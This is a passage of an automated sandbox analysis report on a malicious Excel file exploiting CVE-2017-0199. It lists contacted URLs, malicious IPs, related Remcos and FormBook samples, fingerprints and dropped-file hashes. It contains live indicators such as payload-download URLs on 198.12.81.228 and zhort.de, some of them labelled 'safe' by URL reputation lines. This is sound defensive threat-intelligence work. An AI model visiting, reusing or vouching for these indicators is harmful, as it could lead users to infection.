                        http://www.nirsoft.net/RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsp.entrust.net0Dpowershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.443131890.0000000002371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.438679378.0000000002221000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://ia803104.us.archive.org/27/items/vbs_20240LRpowershell.exe, 0000000A.00000002.443131890.00000000024C1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhvA42C.tmp.15.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.ccleaner.com/go/app_cc_pro_trialkeybhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.entrust.net/server1.crl0powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contextual.media.net/8/nrrV73987.jsbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.imvu.comRegAsm.exe, RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000011.00000002.446215352.0000000000C49000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://198.12.81.228powershell.exe, 0000000C.00000002.438679378.000000000247A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contextual.media.net/bhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.imvu.com/NKRegAsm.exe, 00000011.00000002.445337578.000000000033C000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.msn.com/bhvA42C.tmp.15.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://zhort.de/UlEYs1fSecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cdn.at.atwola.com/_media/uac/msn.htmlbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.google.com/accounts/serviceloginRegAsm.exefalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://198.12.81.228/600/creatednewimagesinpicturebuttersmooth.tIFjEQNEDT32.EXE, 00000008.00000002.422455144.000000000060F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2FsetbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://secure.comodo.com/CPS0powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://198.12.81.228/600/creatednewimagesinpicturebuttersmooth.tIFcEQNEDT32.EXE, 00000008.00000002.422455144.000000000060F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://policies.yahoo.com/w3c/p3p.xmlbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://zhort.de/UlEYs1yX~DF12645870096F092E.TMP.0.dr, F9430000.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://zhort.de/zhort.de.url.3.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.msn.com/advertisement.ad.jsbhvA42C.tmp.15.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        207.241.232.154
                        		ia803104.us.archive.orgUnited States
                        		7941INTERNET-ARCHIVEUStrue
                        198.12.81.228
                        		unknownUnited States
                        		36352AS-COLOCROSSINGUStrue
                        88.99.66.38
                        		zhort.deGermany
                        		24940HETZNER-ASDEtrue
                        192.3.101.172
                        		unknownUnited States
                        		36352AS-COLOCROSSINGUStrue
                        178.237.33.50
                        		geoplugin.netNetherlands
                        		8455ATOM86-ASATOM86NLfalse

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1500777
                        Start date and time:2024-08-28 22:28:08 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 11m 4s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:19
                        Number of new started drivers analysed:1
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • GSI enabled (VBA)
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx
                        Detection:MAL
                        Classification:mal100.phis.troj.spyw.expl.evad.winXLSX@19/30@10/5
                        EGA Information:
                        • Successful, ratio: 71.4%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 170
                        • Number of non-executed functions: 330
                        Cookbook Comments:
                        • Found application associated with file extension: .xlsx
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Active ActiveX Object
                        • Scroll down
                        • Close Viewer
                        • Override analysis time to 56123.7434258316 for current running targets taking high CPU consumption
                        • Override analysis time to 112247.486851663 for current running targets taking high CPU consumption
                        • Override analysis time to 224494.973703326 for current running targets taking high CPU consumption

                        Warnings

                        • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                        • Execution Graph export aborted for target EQNEDT32.EXE, PID 3096 because there are no executed function
                        • Execution Graph export aborted for target powershell.exe, PID 3308 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        16:29:31API Interceptor38x Sleep call for process: EQNEDT32.EXE modified
                        16:29:32API Interceptor6x Sleep call for process: wscript.exe modified
                        16:29:33API Interceptor85x Sleep call for process: powershell.exe modified
                        16:29:41API Interceptor8340561x Sleep call for process: RegAsm.exe modified

                        LLM Input / Output

                        InputOutput
                        URL: Office document Model: jbxai
                        {
"brand":["AVM",
"Microsoft Office"],
"contains_trigger_text":false,
"prominent_button_name":"unknown",
"text_input_field_labels":["unknown"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        207.241.232.154August Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                            PO_304234.xlsGet hashmaliciousRemcosBrowse
                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                    another.rtfGet hashmaliciousRemcosBrowse
                                      Faktura.vbsGet hashmaliciousRemcosBrowse
                                        M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                          PO_20931.xlsGet hashmaliciousRemcosBrowse
                                            88.99.66.38SecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsxGet hashmaliciousFormBookBrowse
                                              Thermo Fisher RFQ_TFS-1805.xlsGet hashmaliciousGuLoaderBrowse
                                                PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                  RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                    M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                        350.xlsGet hashmaliciousFormBookBrowse
                                                          PO082724.xlsGet hashmaliciousRemcosBrowse
                                                            SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                                                              SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                192.3.101.172Inv 30532.xlsGet hashmaliciousRemcosBrowse
                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.2547.11280.rtfGet hashmaliciousRemcosBrowse
                                                                    SecuriteInfo.com.Trojan.DownLoader47.28778.10975.2985.exeGet hashmaliciousRemcosBrowse
                                                                      WIRE RECEIPT.xlsGet hashmaliciousRemcosBrowse
                                                                        PO-05034.xlsGet hashmaliciousRemcosBrowse
                                                                          SecuriteInfo.com.Win32.MalwareX-gen.15358.5163.exeGet hashmaliciousStormKitty, SugarDump, XWormBrowse
                                                                            Payment copy.xlsGet hashmaliciousStormKitty, SugarDump, XWormBrowse
                                                                              178.237.33.50PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              August Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeGet hashmaliciousRemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              another.rtfGet hashmaliciousRemcosBrowse
                                                                              • geoplugin.net/json.gp
                                                                              rnr.exeGet hashmaliciousRemcosBrowse
                                                                              • geoplugin.net/json.gp

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              zhort.deSecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsxGet hashmaliciousFormBookBrowse
                                                                              • 88.99.66.38
                                                                              Thermo Fisher RFQ_TFS-1805.xlsGet hashmaliciousGuLoaderBrowse
                                                                              • 88.99.66.38
                                                                              PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              350.xlsGet hashmaliciousFormBookBrowse
                                                                              • 88.99.66.38
                                                                              PO082724.xlsGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 88.99.66.38
                                                                              SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              ia803104.us.archive.orgAugust Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              another.rtfGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              Faktura.vbsGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              geoplugin.netPO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                              • 178.237.33.50
                                                                              August Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              another.rtfGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              rnr.exeGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              AS-COLOCROSSINGUShttp://conrasty.pro/rd/4GZfNu661Wcuf128ryymsulvqg219KJAPMAHPZPNXNLR15619WARW973R13Get hashmaliciousPhisherBrowse
                                                                              • 172.245.174.190
                                                                              http://conrasty.pro/rd/4GZfNu661Wcuf128ryymsulvqg219KJAPMAHPZPNXNLR15619WARW973R13Get hashmaliciousPhisherBrowse
                                                                              • 172.245.174.190
                                                                              Thermo Fisher RFQ_TFS-1805.xlsGet hashmaliciousGuLoaderBrowse
                                                                              • 192.3.243.166
                                                                              Bukti-Transfer.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 192.210.215.11
                                                                              PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                                              • 192.3.193.155
                                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                              • 107.172.31.21
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                              • 107.172.31.21
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                                              • 198.46.178.181
                                                                              another.rtfGet hashmaliciousRemcosBrowse
                                                                              • 198.46.178.137
                                                                              RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 192.210.214.138
                                                                              AS-COLOCROSSINGUShttp://conrasty.pro/rd/4GZfNu661Wcuf128ryymsulvqg219KJAPMAHPZPNXNLR15619WARW973R13Get hashmaliciousPhisherBrowse
                                                                              • 172.245.174.190
                                                                              http://conrasty.pro/rd/4GZfNu661Wcuf128ryymsulvqg219KJAPMAHPZPNXNLR15619WARW973R13Get hashmaliciousPhisherBrowse
                                                                              • 172.245.174.190
                                                                              Thermo Fisher RFQ_TFS-1805.xlsGet hashmaliciousGuLoaderBrowse
                                                                              • 192.3.243.166
                                                                              Bukti-Transfer.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 192.210.215.11
                                                                              PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                                              • 192.3.193.155
                                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                              • 107.172.31.21
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                              • 107.172.31.21
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                                              • 198.46.178.181
                                                                              another.rtfGet hashmaliciousRemcosBrowse
                                                                              • 198.46.178.137
                                                                              RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 192.210.214.138
                                                                              INTERNET-ARCHIVEUSAugust Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              another.rtfGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              Faktura.vbsGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                                              • 207.241.232.154
                                                                              HETZNER-ASDEfile.exeGet hashmaliciousLummaC, VidarBrowse
                                                                              • 94.130.188.148
                                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                              • 94.130.188.148
                                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                              • 94.130.188.148
                                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                              • 94.130.188.148
                                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                              • 94.130.188.148
                                                                              SecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsxGet hashmaliciousFormBookBrowse
                                                                              • 88.99.66.38
                                                                              Thermo Fisher RFQ_TFS-1805.xlsGet hashmaliciousGuLoaderBrowse
                                                                              • 88.99.66.38
                                                                              PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              ZKB - Zahlungsbest#U00e4tigung an 20240828.pdf.exeGet hashmaliciousQuasarBrowse
                                                                              • 195.201.57.90

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              05af1f5ca1b87cc9cc9b25185115607dAugust Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              • 207.241.232.154
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              • 207.241.232.154
                                                                              PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              • 207.241.232.154
                                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              • 207.241.232.154
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              • 207.241.232.154
                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              • 207.241.232.154
                                                                              another.rtfGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              • 207.241.232.154
                                                                              M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              • 207.241.232.154
                                                                              PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              • 207.241.232.154
                                                                              350.xlsGet hashmaliciousFormBookBrowse
                                                                              • 88.99.66.38
                                                                              • 207.241.232.154
                                                                              7dcce5b76c8b17472d024758970a406bAugust Shipment - Inv No. 041.xlsGet hashmaliciousUnknownBrowse
                                                                              • 88.99.66.38
                                                                              August Shipment - Inv No. 041.xlsGet hashmaliciousUnknownBrowse
                                                                              • 88.99.66.38
                                                                              SecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsxGet hashmaliciousFormBookBrowse
                                                                              • 88.99.66.38
                                                                              August Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              Thermo Fisher RFQ_TFS-1805.xlsGet hashmaliciousGuLoaderBrowse
                                                                              • 88.99.66.38
                                                                              PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 88.99.66.38
                                                                              M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                                              • 88.99.66.38
                                                                              RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 88.99.66.38

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                                                                              Download File
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):131072
                                                                              Entropy (8bit):0.025614997046743235
                                                                              Encrypted:false
                                                                              SSDEEP:6:I3DPcqVGu1HvxggLRhJarvLods/tRXv//4tfnRujlw//+GtluJ/eRuj:I3DPpVfRVOLodyvYg3J/
                                                                              MD5:A7F9B7669680B4F3BA36FA307C3EE266
                                                                              SHA1:747309F4C224F46B0404BD9AEE2343F35E5E6310
                                                                              SHA-256:800AB282135663481B06A86016FB2FF44293FAE5C1F3DA4C9854947812344A3A
                                                                              SHA-512:4625C3B54046DE23DF71838E0535A91263F21044B2056CC0067A3DB8898405B725DABFA1B84AD52FE332C3DE1F6A31DA92398F891FFF1FDAAE4A2B24EE18849D
                                                                              Malicious:false
                                                                              Preview:......M.eFy...z.r..m,.M...P=.. S,...X.F...Fa.q..............................<}.,-B..`.y.............^.y.J....:.QW.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4760
                                                                              Entropy (8bit):4.834060479684549
                                                                              Encrypted:false
                                                                              SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                                              MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                                              SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                                              SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                                              SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                                              Malicious:false
                                                                              Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):0.34726597513537405
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlll:Nll
                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                              Malicious:false
                                                                              Preview:@...e...........................................................

